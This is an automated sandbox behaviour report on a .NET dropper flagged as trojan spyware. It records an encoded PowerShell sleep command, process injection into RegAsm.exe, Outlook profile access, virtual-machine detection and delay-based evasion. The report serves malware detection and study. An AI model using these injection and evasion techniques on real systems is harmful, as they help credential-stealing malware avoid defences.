                Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/9@21/2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, u0005.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.d60000.0.unpack, u0005.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493C710 push es; ret 1_2_0493C720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493ACC0 push es; ret 1_2_0493ACD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493CA10 push es; ret 1_2_0493CA20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493B504 push E801005Eh; ret 1_2_0493B509
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 1768 Thread sleep count: 199 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 244 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800 Thread sleep count: 7238 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4652 Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556 Thread sleep time: -16602069666338586s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7238
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8921
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 60000
                Source: powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.530606213.0000000006A10000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 415000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4A0000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 967008
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Process created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
